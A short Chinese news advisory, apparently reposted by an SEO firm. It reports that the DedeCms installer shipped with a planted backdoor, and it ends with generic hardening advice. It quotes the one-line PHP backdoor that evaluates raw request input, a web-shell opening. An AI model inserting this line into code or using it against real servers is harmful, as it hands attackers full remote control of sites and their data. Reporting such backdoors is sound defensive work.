最新消息,瑞星與 360 今日對外發布警示,稱國內知名的 php 開源網站管理系統織夢 CMS(DedeCms)安裝包被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。

據第三方權威統計數據顯示,目前約有 50 萬網站使用該dedecms系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。
安全界人士分析發現,此類文件被植入一句后門代碼“@eval (file_get_contents ('php://input'));”,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的 WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限,直接訪問服務器上的文件、數據庫等信息。
下面小熊優化的小編給出一個相關建議:
1、盡快轉換系統,可以使用pageadmin、動易、wp這類保持續更新的cms系統、國內一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建議不要使用了。
2、盡量不要網上下載不知名的插件,尤其使用wp的網站,大多被黑的都是網上亂用插件導致的。
3、保持系統更新,官方更新的版本及時更新上,不要感覺現在功能夠用了就不更新,有時候更新不僅僅是功能更新,也是安全上的更新。